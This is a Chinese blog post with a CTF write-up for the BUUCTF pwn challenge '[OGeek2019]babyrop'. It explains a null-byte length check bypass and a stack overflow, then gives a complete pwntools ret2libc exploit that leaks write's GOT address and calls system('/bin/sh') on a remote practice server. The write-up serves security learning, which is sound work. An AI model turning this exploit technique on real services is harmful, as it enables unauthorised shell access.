共计 944 个字符,预计需要花费 3 分钟才能阅读完成。
提醒:本文最后更新于 2024-08-28 15:14,文中所关联的信息可能已发生改变,请知悉!
这题需要用到一些 plt 和 got 等的前置知识,可以参考:https://bbs.pediy.com/thread-262357.htm
checksec
![BUUCTF-PWN-[OGeek2019]babyrop](https://cdn.jsdelivr.net/gh/Chaos-xBug/img/blog/202111131312623.png "BUUCTF-PWN-[OGeek2019]babyrop")
IDA
![BUUCTF-PWN-[OGeek2019]babyrop](https://cdn.jsdelivr.net/gh/Chaos-xBug/img/blog/202111131318821.png "BUUCTF-PWN-[OGeek2019]babyrop")
![BUUCTF-PWN-[OGeek2019]babyrop](https://cdn.jsdelivr.net/gh/Chaos-xBug/img/blog/202111131319356.png "BUUCTF-PWN-[OGeek2019]babyrop")
sub_804871F函数的返回值就是下面 sub_80487D0 的参数(v5 --> a1)
![BUUCTF-PWN-[OGeek2019]babyrop](https://cdn.jsdelivr.net/gh/Chaos-xBug/img/blog/202111131319804.png "BUUCTF-PWN-[OGeek2019]babyrop")
而在 sub_80487D0 中第二个 read 函数是可能的溢出点,条件是 a1!= 127 并且 a1 大于 buf 的长度
之后利用题目给出的 libc,使用 ret2libc 的方法拿到 shell
EXP
from pwn import *
p = remote('node4.buuoj.cn', 25034)
elf = ELF('./pwn')
libc = ELF('libc-2.23.so')
write_plt = elf.plt['write']
main_addr = 0x08048825
write_got = elf.got['write']
payload1 = b'\0' + b'a' * 6 + b'\xff'
p.sendline(payload1)
payload2 = b'a' * (0xe7 + 4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
# # 覆盖 buf # 溢出到 write 的 plt 表 # write 返回到 main # write(1, write_got, 4)
p.recvuntil('Correct\n')
p.sendline(payload2)
write_addr = u32(p.recv(4))
print(hex(write_addr))
libc_base = write_addr - libc.symbols['write']
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search('/bin/sh'.encode()))
p.sendline(payload1)
p.recvuntil('Correct\n')
paylaod3 = b'a' * (0xe7 + 4) + p32(system_addr) + p32(0) + p32(binsh_addr)
p.sendline(paylaod3)
p.interactive()
p.sendline()结果
![BUUCTF-PWN-[OGeek2019]babyrop](https://cdn.jsdelivr.net/gh/Chaos-xBug/img/blog/202111131326028.png "BUUCTF-PWN-[OGeek2019]babyrop")
正文完
